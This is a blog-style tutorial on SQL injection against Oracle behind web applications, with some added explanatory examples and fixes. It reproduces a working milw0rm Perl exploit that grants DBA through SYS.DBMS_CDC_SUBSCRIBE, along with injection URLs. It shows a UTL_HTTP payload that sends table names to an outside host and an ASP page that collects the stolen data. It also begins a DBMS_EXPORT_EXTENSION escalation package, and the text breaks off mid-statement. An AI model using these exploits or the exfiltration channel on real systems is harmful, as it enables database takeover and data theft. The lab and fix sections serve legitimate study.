Art of WEB-SQL-INJECTION 2nd ORACLE


Kindles blog

Many people say that SQL injection in ASP, PHP or JSP is mostly a matter of the scripting language. In fact the script is only the carrier; what matters is the database behind it.
For example, ASP/ASPX and JSP impose no restrictions at all. PHP does escape input (magic_quotes / addslashes), but that escaping only helps with MySQL, PostgreSQL and SQLite; against any other database it is useless, because those engines do not treat a backslash as an escape character. ColdFusion (CFM) is likely no safer.
I don't think any of these scripting languages is especially strict. For the details of each database, see
Art of WEB-SQL-INJECTION 1st; thanks to AMXSA and I.C.E for their support.
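To show why PHP's backslash escaping does nothing for Oracle, here is an added example that is not part of the original post. The table, rows and attacker input are constructed for illustration; the point is how Oracle tokenizes the literal.

```sql
-- Added example (not from the original post): Oracle vs. backslash escaping.
-- Constructed sample table.
CREATE TABLE kj021320 (name VARCHAR2(50));
INSERT INTO kj021320 VALUES ('alice');
INSERT INTO kj021320 VALUES ('bob');
COMMIT;

-- Attacker input:                   x' OR 1=1--
-- After PHP addslashes()/magic_quotes: x\' OR 1=1--
-- MySQL reads \' as an escaped quote, so the whole input stays inside one
-- string literal. Oracle treats the backslash as an ordinary character: the
-- literal ends at the quote that follows it and the rest is parsed as SQL.
SELECT name FROM kj021320 WHERE name = 'x\' OR 1=1--';
-- Oracle executes:  name = 'x\'  OR  1=1   (the -- comment swallows the last quote)
-- and returns both rows; the "escaping" changed nothing.

-- What Oracle actually escapes is a doubled single quote. Here the literal is
-- the text  x' OR 1=1--  and the query is a plain lookup for that name.
SELECT name FROM kj021320 WHERE name = 'x'' OR 1=1--';
-- Returns no rows.
```

Doubling quotes is what an Oracle-aware escaper must do; a bind variable (PreparedStatement in JSP, OCI binds in PHP) avoids the question entirely, and that is the fix the rest of this article implicitly argues for.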

OK, back to the point. Attacks on Oracle have long received attention abroad, but there are few researchers in China, or the technique is not mature enough, so let me fire the first shot!
SQL injection depends on the database's SQL parsing engine, and Oracle does not execute multiple statements in one call (no stacked queries)!
If you use PL/SQL Developer and similar tools you can run several statements at once,
but only because the tool splits them up and submits each statement separately.
Several Oracle attack methods have been proposed abroad, but there are not many ways to use them through web SQL injection!
Early on, both NGS and Argeniss proposed FUNCTION/PROCEDURE injection:
that is, some user-defined functions or stored procedures themselves contain a SQL injection.
Let me use an MSSQL function as an example (SQL Server only allows EXEC inside a stored procedure, not a function; the concatenation pattern is what matters here):
CREATE FUNCTION ISTO_KJ021320 (@SQL varchar(100))
RETURNS int
AS
BEGIN
    -- @SQL is concatenated straight into the statement: this is the injection point
    EXEC('SELECT * FROM KJ021320 WHERE name = ''' + @SQL + '''');
    RETURN 0;
END
The function above obviously does not filter the @SQL parameter, so SQL injection exists!
The same pattern is widespread in Oracle, from user-defined functions all the way up to the system packages.
The functions in the system packages generally operate on system tables that a normal user cannot query,
yet a normal user can call these system functions and obtain the related information ~
Oracle's privilege model makes this easy to understand: a PL/SQL unit runs by default with definer's rights, so

User ---> calls a function (runs with the privileges of the function's owner, e.g. SYS for SYS packages) ---> performs an operation
So we only need to change what the function does in order to add users, create a DBA, and so on...

The methods published on milw0rm, SecurityFocus and by Red Database Security are all very simple, but how to apply them is not explained ~
Let me copy one here ~
For example
DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION: this function of that package contains an injection.
OK, the exploit published on milw0rm is a piece of Perl code.

#!/usr/bin/perl
# milw0rm PoC for the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION injection
# (cleaned up from the garbled copy; requires DBI and DBD::Oracle)
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/%opt/;

sub usage {
    print <<"USAGE";

Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

Options:
  -h <host>    target host
  -s <sid>     target sid name
  -u <user>    user
  -p <passwd>  password
  -g | -r      (g)rant dba to user | (r)evoke dba from user
  [-P <port>   Oracle port]

USAGE
    exit 0;
}

my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if (!$opt{h} or !$opt{s} or !$opt{u} or !$opt{p});
&usage if (!$opt{g} and !$opt{r});
my $user = uc $opt{u};

my $dbh = undef;
if ($opt{P}) {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
    $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}

my $sqlcmd = "grant dba to $user";
print "[-] Wait...\n";

if ($opt{r}) {
    print "[-] Revoking DBA from $user...\n";
    $sqlcmd = "revoke dba from $user";
    $dbh->do($sqlcmd);
    print "[-] Done!\n";
    $dbh->disconnect;
    exit;
}

print "[-] Creating evil function...\n";
# OWN runs with the privileges of whoever is the current user when it is
# reached; reached from inside the SYS-owned package, that user is SYS.
$dbh->do(qq{
CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
AUTHID CURRENT_USER
AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
RETURN(0);
END;
});

print "[-] Go... (dont worry about errors)!\n";
# The subscription name is concatenated into SQL inside the package, so the
# argument '||USER.OWN||' closes the literal and makes that SQL call OWN.
my $something = $dbh->prepare(qq{
BEGIN
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||$user.own||''');
END;
});
$something->execute;
$something->finish;
print "[-] you got the powah!!\n";
$dbh->disconnect;
exit;

-------


The method above first creates a function named OWN.
It executes grant dba to $user, granting the DBA role to our user, and it is declared AUTHID CURRENT_USER, so it runs with the privileges of whoever is the current user when it is reached.
The function name is then injected into the stored procedure that contains the injection:
SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION (with the OWN function embedded in its argument).
Because
ACTIVATE_SUBSCRIPTION concatenates its argument into SQL,
the SYS-owned package ends up calling OWN, and OWN runs as SYS and grants the privilege directly.
Here a function has to be created first! But with web SQL injection we cannot send a second statement to create a function!
How can this problem be solved?
The injection inside ACTIVATE_SUBSCRIPTION is itself a string-concatenation injection, similar to our web SQL injection.
How do I detect and dig out Oracle function injection? Next time I will write an article on <detecting function injection in ORACLE>.
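The privilege chain described above (a caller reaching a definer-rights function, and the OWN trick in the milw0rm exploit) can be reproduced in a lab without the real SYS package. The following is an added example, not code from the original post and not the milw0rm exploit: the vulnerable procedure, the schemas APPOWNER and LOWUSER, and their privileges are all assumptions, with APPOWNER standing in for SYS.

```sql
-- Added lab example (not from the original post). Hypothetical schemas:
-- APPOWNER owns a definer-rights procedure that concatenates its argument
-- into dynamic SQL; LOWUSER can only create procedures and log in.

-- 0. Setup, as SYS. APPOWNER stands in for SYS, so it gets DBA with ADMIN
--    OPTION (needed for the GRANT that the payload performs).
CREATE USER appowner IDENTIFIED BY appowner;
GRANT CREATE SESSION, CREATE PROCEDURE, DBA TO appowner WITH ADMIN OPTION;
CREATE USER lowuser IDENTIFIED BY lowuser;
GRANT CREATE SESSION, CREATE PROCEDURE TO lowuser;

-- 1. As APPOWNER: the vulnerable unit. No AUTHID clause means AUTHID DEFINER,
--    so it always runs with APPOWNER's privileges, whoever calls it.
CREATE OR REPLACE PROCEDURE appowner.check_subscription(p_name IN VARCHAR2) AS
  v_name VARCHAR2(4000);
BEGIN
  -- p_name is concatenated, not bound: this is the injection point
  EXECUTE IMMEDIATE 'SELECT UPPER(''' || p_name || ''') FROM dual' INTO v_name;
  DBMS_OUTPUT.PUT_LINE('checked ' || v_name);
END;
/
GRANT EXECUTE ON appowner.check_subscription TO lowuser;

-- 2. As LOWUSER: the payload. AUTHID CURRENT_USER means that when OWN is
--    reached from inside APPOWNER's definer-rights SQL, the current user is
--    APPOWNER, so the GRANT runs with APPOWNER's privileges. The autonomous
--    transaction lets a function called from SQL perform DDL and COMMIT.
CREATE OR REPLACE FUNCTION lowuser.own RETURN NUMBER
AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO LOWUSER';
  COMMIT;
  RETURN 0;
END;
/

-- 3. As LOWUSER: inject the function call into the quoted argument.
--    The PL/SQL literal '''||lowuser.own||''' is the text  '||lowuser.own||'
--    so the procedure builds and runs:
--      SELECT UPPER(''||lowuser.own||'') FROM dual
--    APPOWNER (a DBA) may execute LOWUSER.OWN, just as SYS may.
BEGIN
  appowner.check_subscription('''||lowuser.own||''');
END;
/

-- 4. Check, as LOWUSER (reconnect so the new role is active in the session).
SELECT granted_role FROM user_role_privs WHERE granted_role = 'DBA';
```

The fix on APPOWNER's side is to bind p_name (`EXECUTE IMMEDIATE '... WHERE name = :1' USING p_name`) or at least pass it through DBMS_ASSERT.ENQUOTE_LITERAL. From 12c onward there is also a platform-level brake: if INHERIT PRIVILEGES ON USER appowner has been revoked from PUBLIC, step 3 fails with ORA-06598 instead of granting DBA, because LOWUSER's invoker-rights function is no longer allowed to borrow APPOWNER's privileges.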

That covers the principles!
I remember many articles claiming that SQL statements are written like this:
sqlstr = "begin select * from kj021320 where name = '$name'; end;";
and that therefore multiple statements can be executed! Actually this is nonsense: who writes code like that? Generally the SQL statement is issued directly:
sqlstr = "select * from kj021320 where name = '$name'";
Therefore in Oracle web SQL injection you can only use functions (anything callable from inside a SELECT); stored procedures cannot be used, since they need a PL/SQL block. For more information see the documentation.

There is an injection point on the web:
http://127.0.0.1:8080/VOA/test.jsp?id=282 (numeric type)
First, confirm the user's privileges:
http://127.0.0.1:8080/VOA/test.jsp?id=282 and exists (select * from dba_tables)
Here is a small detail about the
ORACLE system views:
Only users with DBA privileges can access the views whose names start with DBA_, such as DBA_USERS and DBA_TABLES.
Ordinary users can query
the two views USER_TABLES and ALL_TABLES. The former lists your own tables; the latter lists your own tables plus the tables other users have granted you access to!
Injection tools generally only need to query these two views to obtain the user's table structure.

Going back: the injection above usually returns false!
It doesn't matter, you still have function injection to work with ~
So how can we find out where the Oracle host is, that is, whether the database sits on the same machine as the web server?
For that we use
the REQUEST function in the UTL_HTTP package.
Example:
SELECT UTL_HTTP.REQUEST('http://www.isto.cn/getdata.asp?data=' || TABLE_NAME) FROM USER_TABLES WHERE ROWNUM <= 1
It sends the data out as a URL request! For details on how to call out to remote hosts from the various big databases, see
Art of WEB-SQL-INJECTION 1st

So how do we build this into the injection? Very easy!
http://127.0.0.1:8080/VOA/test.jsp?id=282 and 1 in (SELECT UTL_HTTP.REQUEST('http://www.isto.cn/getdata.asp?data=' || TABLE_NAME) FROM USER_TABLES)
Like this!
But we also have to build a page that receives the request parameter. A simple ASP implementation:
<%
If Request("data") = "" Then
    ' no data parameter: show everything collected so far
    Response.Write Application("oracle_data")
Else
    Dim dataValue
    ' REMOTE_HOST is the address the database server connected from
    dataValue = Request.ServerVariables("REMOTE_HOST") & " data:" & Request("data") & "<br>"
    Application.Lock
    If Request("clear") <> "" Then
        ' ?clear=1 starts a fresh log
        Application("oracle_data") = dataValue
    Else
        Application("oracle_data") = Application("oracle_data") & dataValue
    End If
    Application.UnLock
End If
%>
Unless the database sits on an intranet and cannot reach out, this way we get its IP address and its data ~ much faster than guessing table names!

Next, with its IP address we can scan for the Oracle listener port and obtain the SID, either through SELECT queries or by probing with tnscmd!

Next, let me get started on something else!
A 0day published abroad in
GET_DOMAIN_INDEX_TABLES (SYS.DBMS_EXPORT_EXTENSION). There doesn't seem to be much exploitation information on it abroad.
That's all there was. Read the description from the time:

CREATE OR REPLACE
PACKAGE mybadpackage AUTHID CURRENT_USER
IS
  -- the ODCIIndexGetMetadata signature is what the vulnerable SYS code calls back into
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
  RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY mybadpackage
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo, P3 VARCHAR2,
                                 p4 VARCHAR2, env SYS.odcienv)
  RETURN NUMBER
  IS
    PRAGMA AUTONOMOUS_TRANSACTION;
  BEGIN
    -- runs as SYS when reached from the SYS package
    EXECUTE IMMEDIATE 'grant dba to hacker';
    COMMIT;
    RETURN(1);
  END;
END;
/
DECLARE
INDE
